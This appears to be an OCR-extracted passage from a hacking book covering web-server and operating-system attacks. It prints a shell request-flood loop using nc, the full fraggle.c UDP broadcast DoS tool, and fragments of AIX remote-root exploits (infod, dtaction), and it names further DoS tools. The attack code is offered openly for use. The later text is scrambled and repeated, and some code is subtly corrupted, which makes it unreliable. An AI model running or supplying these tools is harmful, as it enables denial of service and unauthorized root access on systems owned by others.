485 DUZOA=`perl -e '{ print "A"x4093} '` MAX=30 while :; do ILE=0 while [ $ILE -lt $MAX ]; do ( ( echo "GET /" echo $DUZOA echo ) | nc $SERVER $PORT & sleep $WAIT kill -9 $! ) &>/dev/null & ILE=$[ILE+1] done sleep $WAIT done O’Reilly WebSite Professional Rated as one of the fastest-growing personal and corporate Internet server daemons, WebSite Professional (http://website.oreilly.com) is among the most robust Web servers on the market (see Figure 9.10). With custom CGI and Perl support, plus VBScript, JavaScript, Python, and Microsoft ASPA scripting standardization, this suite is unmatched in ease of use and programmability. With 486 Figure 9.10 WebSite Professional administration. this product, an average neophyte could fabricate a standard Web server configuration in minutes. Liabilities Denial-of-Service Attack Synopsis: WebSite Professional is vulnerable to a DoS attack that can cause immediate CPU congestion, resulting in service encumbrance. Hack State: Severe congestion. Vulnerabilities: All revisions. 487 Breach: This DoS penetration attack (fraggle.c) causes an immediate jump to 100 percent system CPU utilization. Multiple DoS attacks cause sustained CPU congestion from 68 to 85 percent, and up to 100 percent if simultaneously flooded with HTTP requests. Fraggle.c struct pktinfo { int ps; int src; int dst; } ; void fraggle (int, struct sockaddr_in *, u_long dest, struct pktinf o *); void sigint (int); unsigned short checksum (u_short *, int); int main (int argc, char *argv[]) { struct sockaddr_in sin; struct hostent *he; struct pktinfo p; int s, num, delay, n, cycle; char **bcast = malloc(1024), buf[32]; FILE *bfile; /* banner */ fprintf(stderr, "\nfraggle.c by TFreak\n\n"); /* capture ctrl-c */ signal(SIGINT, sigint); /* check for enough cmdline args */ if (argc < 5) { fprintf(stderr, "usage: %s " " [dstport] [srcport] [psize] \n\n" "target\t\t= address to hit\n" "bcast file\t= file containing broadcast add rs\n" "num packets\t= send n packets (n = 0 is consta nt)\n" "packet delay\t= usleep() between packets (in m s)\n" "dstport\t\t= port to hit (default 7)\n" "srcport\t\t= source port (0 for random)\n" "ps\t\t= packet size\n\n", argv[0]); exit(-1); } /* get port info */ if (argc >= 6) p.dst = atoi(argv[5]); else p.dst = 7; if (argc >= 7) p.src = atoi(argv[6]); 488 else p.src = 0; /* packet size redundant if not using echo port */ if (argc >= 8) p.ps = atoi(argv[7]); else p.ps = 1; /* other variables */ num = atoi(argv[3]); delay = atoi(argv[4]); /* resolve host */ if (isdigit(*argv[1])) sin.sin_addr.s_addr = inet_addr(argv[1]); else { if ((he = gethostbyname(argv[1])) == NULL) { fprintf(stderr, "Can't resolve hostname!\n\n"); exit(-1); } memcpy( (caddr_t) &sin.sin_addr, he->h_addr, he->h_length); } sin.sin_family = AF_INET; sin.sin_port = htons(0); /* open bcast file and build array */ if ((bfile = fopen(argv[2], "r")) == NULL) { perror("opening broadcast file"); exit(-1); } n = 0; while (fgets(buf, sizeof buf, bfile) != NULL) { buf[strlen(buf) - 1] = 0; if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) continue; bcast[n] = malloc(strlen(buf) + 1); strcpy(bcast[n], buf); n++; } bcast[n] = '\ 0'; fclose(bfile); /* check for addresses */ if (!n) { fprintf(stderr, "Error: No valid addresses in file!\n\n"); exit(-1); } /* create our raw socket */ if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) <= 0) { 489 perror("creating raw socket"); exit(-1); } printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]); for (n = 0, cycle = 0; n < num || !num; n++) { if (!(n % 25)) { printf("."); fflush(stdout); } srand(time(NULL) * rand() * getpid()); fraggle(s, &sin, inet_addr(bcast[cycle]), &p); if (bcast[++cycle] == NULL) cycle = 0; usleep(delay); } sigint(0); } void fraggle (int s, struct sockaddr_in *sin, u_long dest, struct p ktinfo *p) { struct iphdr *ip; struct udphdr *udp; char *packet; int r; packet = malloc(sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps); ip = (struct iphdr *)packet; udp = (struct udphdr *) (packet + sizeof(struct iphdr)); memset(packet, 0, sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps); /* ip header */ ip->protocol = IPPROTO_UDP; ip->saddr = sin->sin_addr.s_addr; ip->daddr = dest; ip->version = 4; ip->ttl = 255; ip->tos = 0; ip- >tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + p- >ps); ip->ihl = 5; ip->frag_off = 0; ip->check = checksum((u_short *)ip, sizeof(struct iphdr)); /* udp header */ udp->len = htons(sizeof(struct udphdr) + p->ps); udp->dest = htons(p->dst); if (!p->src) udp->source = htons(rand()); else udp->source = htons(p->src); 490 /* send it on its way */ r = sendto(s, packet, sizeof(struct iphdr) + sizeof(struct udph dr) + p->ps, 0, (struct sockaddr *) sin, sizeof(struct sockaddr_i n)); if (r == -1) { perror("\nSending packet"); exit(-1); } free(packet); /* free willy 2! */ } unsigned short checksum (u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft ; } if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } sum = (sum >> 17) + (sum & 0xffff); sum += (sum >> 17); answer = -sum; return (answer); } void sigint (int ignoremewhore) { fprintf(stderr, "\nDone!\n\n"); exit(0); } Conclusion There are hordes of hack attack liabilities for gateways, routers, and Internet server daemons. In this chapter we reviewed some of those that are more common among those exploited in the Underground. The Tiger Tools repository on the CD in the back of this book can help you search for those liabilities particular to your analysis. Also be sure to check www.TigerTools.net for the necessary tools and exploit code compilations. Let’s move on to the next chapter and discuss hack attack penetrations on various operating systems. 491 CHAPTER 10 Operating Systems An operating system (O/S) can be defined as the collection of directives required before a computer system can run. Thus, the O/S is the most important software in any computer system. A computer relies on the O/S to manage all of the programs and hardware installed and connected to it. A good general analogy would be to think of the operating system as the post office: The post office is responsible for the flow of mail throughout your neighborhood; likewise, the O/S is in command of the flow of information through your computer system. Operating systems are generally classified according to their host system functions, which may include supercomputers, mainframes, servers, workstations, desktops, and even handheld devices. The O/S dictates how data is saved to storage devices; it keeps track of filenames, locations, and security, while controlling all connected devices (as shown in Figure 10.1). When a computer is powered on, the operating system automatically loads itself into memory, initializes, and runs other programs. In addition, when other programs are running, the O/S continues to operate in the background. Popular operating systems include DOS, Microsoft Windows, MacOS, SunOS, and UNIX. Hackers have been exploiting these operating systems since the beginning of their development, so the purpose of this section is to introduce the various hacking techniques used to manipulate them. The investigation will include Figure 10.1 Operating system functionality. AIX, BSD, Digital, HP/UX, IRIX, UNIX, Linux, Macintosh, Windows, OS/2, SCO, Solaris, and VAX/VMS. We’ll begin with UNIX. UNIX 492 There are numerous exploits for every UNIX operating system type, and although extensive testing has not been performed nor documented, some exploits are interchangeable or can be modified for use on different UNIX types. Common breach methods against all UNIX flavors include root exploitation, buffer overflow attacks, flooding, and universal port daemon hijacking described earlier. The following list of common deep-rooted commands can be used as a reference for UNIX exploit execution: alias View current aliases. awk Search for a pattern within a file. bdiff Compare two large files. bfs Scan a large file. ca Show calendar. cat Concatenate and print a file. cc C compiler. cd Change directory. chgrb Change group ownership. chmod Change file permission. chown Change file ownership. cmp Compare two files. comm Compare common lines between two files. cp Copy file. cu Call another UNIX system. date Show date. df List mounted drives. diff Display difference between two files. du Show disk usage in blocks. echo Echo data to the screen or file. ed Text editor. env List current environment variables. ex Text editor. expr Evaluate mathematical formula. find Find a file. f77 Fortran compiler format Initialize floppy disk. grep Search for a pattern within a file. help Help. kill Stop a running process. ln Create a link between two files. 493 ls List the files in a directory. mail Send/receive mail. mkdir Make directory. more Display data file. mv Move or rename a file. nohup Continue running a command after logging out. nroff Format text. passwd Change password. pkgadd Install a new program. ps Lists the current running processes. pwd Display the name of the working directory. rm Remove file. rmdir Remove directory. set List shell variables. setenv Set environment variables. sleep Pause a process. source Refresh and execute a file. sort Sort files. spell Check for spelling errors. split Divide a file. stty Set terminal options. tail Display the end of a file. tar Compress all specified files into one file. touch Create an empty file. troff Format output. tset Set terminal type. umask Specify new creation mask. uniq Compare two files. uucp UNIX to UNIX copy/execute. vi Full-screen text editor. volcheck Check for mounted floppy. wc Displays detail. who Show current users. write Send a message to another user. ! Repeat command. AIX 494 AIX, by IBM (www.ibm.com), is an integrated flavor of the UNIX operating system that supports 32-bit and 64-bit systems. The computers that run AIX include the entire range of RS/6000 systems, from entry-level servers and workstations to powerful supercomputers, such as the RS/6000 SP. Interestingly, AIX was the first O/S in its class to achieve independent security evaluations and to support options including C2 and B1 functions (see Part 3 for security class explanations). Also, thanks to new Web-based management sys- Figure 10.2 Remote AIX network configuration. tems, it is possible to remotely manage AIX systems from anywhere on the Internet, as illustrated in Figure 10.2. Liabilities Illuminating Passwords Synopsis: A diagnostic command can unveil passwords out of the shadow—the encoded one-way hash algorithm. [...]... sprintf(buffer,"%s", "A z=! LOGNAME"); 498 send_environ(buffer,param); /* Start info_gr with -q parameter or the process will be run locally and not from the daemon … */ sprintf(buffer,"%c%c%c%c",1,45,113,0); fwrite(buffer,1,4,param); fclose(param); param=fopen("/tmp/tempo.fun","rb"); fseek(param,0,SEEK_END); taille_param=ftell(param); fseek(param,0,SEEK_SET); fread(paramz,1,taille_param,param); fclose(param); unlink("/tmp/tempo.fun");... Promising future Backed by the resources and expertise of HP Liabilities Denial-of-Service Attack 5 17 Synopsis: DoS attack that can potentially terminate an IP connection Hack State: Severe congestion Vulnerabilities: All flavors Breach: Nuke.c, by renown super hacker Satanic Mechanic, is a DoS attack that can kill almost any IP connection using ICMP- unreachable messages Nuke.c #include #include #include.. .Hack State: Password exposure Vulnerabilities: AIX 3x/4x + Breach: When troubleshooting, AIX support teams generally request output from the snap a command As a diagnostic tool, this command exports system information (including passwords) into a directory on free drive space With this potential threat, a hacker can target the /tmp/ib msupt/general/ directory and locate the password file,... thus bypassing password shadowing Remote Root Synopsis: AIX infod daemon has remote root login vulnerabilities Hack State: Unauthorized root access Vulnerabilities: AIX 3x/4x Breach: The Info Explorer module in AIX is used to centralize documentation; as such, it does not perform any validation on data sent to the local socket that is bounded As a result, hackers can send bogus data to the daemon module,... 64-bit power Runs larger applications, and processes large data sets faster Industry’s leading performance Achieved via V-Class and N-Class servers Broadest application portfolio Cost-effectively delivers leading packaged application software Easy upgrades Enables unmodified use of 9.x or 10.x applications (also runs 32-bit and 64bit side by side) Widely supported Is compatible with the full line of... unlink("/tmp/tempo.fun"); /* Thank you Mr daemon :) */ write(chaussette,paramz,taille_param); printf("\n%s %s\n",OK,getenv("HOSTNAME")); close(chaussette); } The programs in this chapter can be found on the CD bundled with this book Remote Root Synopsis: AIX dtaction and home environment handling have remote root shell vulnerabilities Hack State: Unauthorized root access Vulnerabilities: AIX 4.2 Breach: With aixdtaction.c... tempo[TAILLE_BUFFER]; int taille; taille=strlen(var); sprintf(tempo,"%c%s%c%c%c",taille,var,0,0,0); 495 fwrite(tempo,1,taille+4,param); } main(int argc,char** argv) { struct sockaddr_un sin,expediteur; struct hostent *hp; struct passwd *info; int chaussette,taille_expediteur,port,taille_struct,taille_pa ram; char buffer[TAILLE_BUFFER],paramz[TAILLE_BUFFER],*disp,*point eur; FILE *param; char *HOME,*LOGIN; int... AF_INET; address->sin_port = htons(port); address->sin_addr.s_addr = inet_addr(hostname); if ((int)address->sin_addr.s_addr == -1) { host = gethostbyname(hostname); if (host) { bcopy( host->h_addr, (char *)&address>sin_addr,host->h_length); } else { puts("Couldn't resolve the address!!!"); exit(ERROR_FAILURE); } } } BSD Panic Attack Synopsis: A BSD DoS attack, smack.c, sends random ICMP-unreachable packets... are backed by first-rate service and support Liabilities Denial-of-Service Attack Synopsis: BSD is vulnerable to a DoS attack; sending customized packets to drop active TCP connections Hack State: Severe congestion 502 Vulnerabilities: BSD flavors Breach: The usage is quite simple: rst_flip where A and B are the target current sessions rst_flip.c... should be aligned at 4bytes bounda ry */ newenv[0]=createvar("EGGSHEL",(char*)&buf[0]); newenv[1]=createvar("EGGSHE2",(char*)&buf[0]); newenv[2]=createvar("EGGSHE3",(char*)&buf[0]); newenv[3]=createvar("EGGSHE4",(char*)&buf[0]); newenv[4]=createvar("DISPLAY",getenv("DISPLAY")); newenv[5]=createvar("HOME",(char*)&frame[0]); newenv[6]=NULL; args[0]=prog2; puts("Start… ");/*Here we go*/ execve(prog,args,newenv); . an average neophyte could fabricate a standard Web server configuration in minutes. Liabilities Denial-of-Service Attack Synopsis: WebSite Professional is vulnerable to a DoS attack that can. for a pattern within a file. bdiff Compare two large files. bfs Scan a large file. ca Show calendar. cat Concatenate and print a file. cc C compiler. cd Change directory. chgrb Change. fseek(param,0,SEEK_END); taille_param=ftell(param); fseek(param,0,SEEK_SET); fread(paramz,1,taille_param,param); fclose(param); unlink("/tmp/tempo.fun"); /* Thank you Mr daemon :) */